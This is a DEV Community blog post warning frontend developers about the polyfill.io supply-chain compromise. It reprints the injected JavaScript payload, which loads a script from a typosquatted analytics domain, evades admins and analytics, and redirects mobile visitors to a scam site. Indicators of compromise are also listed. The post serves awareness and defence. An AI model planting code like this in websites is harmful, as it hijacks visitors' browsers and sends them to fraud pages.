DEV Community

Cover image for Frontend developer must read about polyfill? why?
David William Da Costa
David William Da Costa

Posted on

Frontend developer must read about polyfill? why?

so previously, you maybe already know that one of the library called polyfill got malicious scripts. before dive in, we need to know what is polyfill and why frontend must know?

polyfill is library that gave modern functionality in javascript still work on older browser. so an example like fetch that not work on old browser still work because this library can convert it and the problem with this library is the script that injected into website from this library or other can access all of script on users. that's was scary for me as developer and also as a users. This malicious attack can exploit you system, as a frontend developer we need to delete this polyfill.io from our project.

also the original author from polyfill recommends to not use polyfill at all, as it is no longer needed by modern browser. Meanwhile, both Fastly and Cloudflare have put up trustworthy alternatives, if you still need it.

Polyfill malicious payload example

after i read article from sansec.io. there is an example of malicious payload:

function isPc() {
  try {
    var _isWin =
        navigator.platform == "Win32" || navigator.platform == "Windows",
      _isMac =
        navigator.platform == "Mac68K" ||
        navigator.platform == "MacPPC" ||
        navigator.platform == "Macintosh" ||
        navigator.platform == "MacIntel";
    if (_isMac || _isWin) {
      return true;
    } else {
      return false;
    }
  } catch (_0x44e1f6) {
    return false;
  }
}
function vfed_update(_0x5ae1f8) {
  _0x5ae1f8 !== "" &&
    loadJS(
      "https://www.googie-anaiytics.com/html/checkcachehw.js",
      function () {
        if (usercache == true) {
          window.location.href = _0x5ae1f8;
        }
      }
    );
}
function check_tiaozhuan() {
  var _isMobile = navigator.userAgent.match(
    /(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
  );
  if (_isMobile) {
    var _curHost = window.location.host,
      _ref = document.referrer,
      _redirectURL = "",
      _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
      _rnd = Math.floor(Math.random() * 100 + 1),
      _date = new Date(),
      _hours = _date.getHours();
    if (
      _curHost.indexOf("www.dxtv1.com") !== -1 ||
      _curHost.indexOf("www.ys752.com") !== -1
    ) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else {
      if (_curHost.indexOf("shuanshu.com.com") !== -1) {
        _redirectURL = "https://kuurza.com/redirect?from=bitget";
      } else {
        if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
          _redirectURL = "https://kuurza.com/redirect?from=bitget";
        } else {
          if (_hours >= 0 && _hours < 2) {
            if (_rnd <= 10) {
              _redirectURL = _kuurzaBitGet;
            }
          } else {
            if (_hours >= 2 && _hours < 4) {
              _rnd <= 15 && (_redirectURL = _kuurzaBitGet);
            } else {
              if (_hours >= 4 && _hours < 7) {
                _rnd <= 20 && (_redirectURL = _kuurzaBitGet);
              } else {
                _hours >= 7 && _hours < 8
                  ? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
                  : _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
              }
            }
          }
        }
      }
    }
    _redirectURL != "" &&
      !isPc() &&
      document.cookie.indexOf("admin_id") == -1 &&
      document.cookie.indexOf("adminlevels") == -1 &&
      vfed_update(_redirectURL);
  }
}
let _outerPage = document.documentElement.outerHTML,
  bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
  wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
  aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
  aplausix = _outerPage.indexOf(".plausible.io") != -1,
  statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
  ? setTimeout(check_tiaozhuan, 2000)
  : check_tiaozhuan();
Enter fullscreen mode Exit fullscreen mode

there is indicators of compromise

https://kuurza.com/redirect?from=bitget
https://www.googie-anaiytics.com/html/checkcachehw.js
https://www.googie-anaiytics.com/ga.js
https://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js
https://union.macoms.la/jquery.min-4.0.2.js
https://newcrbpc.com/redirect?from=bscbc

you can also read this article and video:

Top comments (2)

Collapse
 
kalkwst profile image
Kostas Kalafatis

Just a heads up that you can add highlighting to the code blocks if you'd like. Just change:

code block with no colors example

... to specify the language:

code block with colors example

More details in our editor guide!

Collapse
 
davidwilliam_ profile image
David William Da Costa

nice, thank you for the information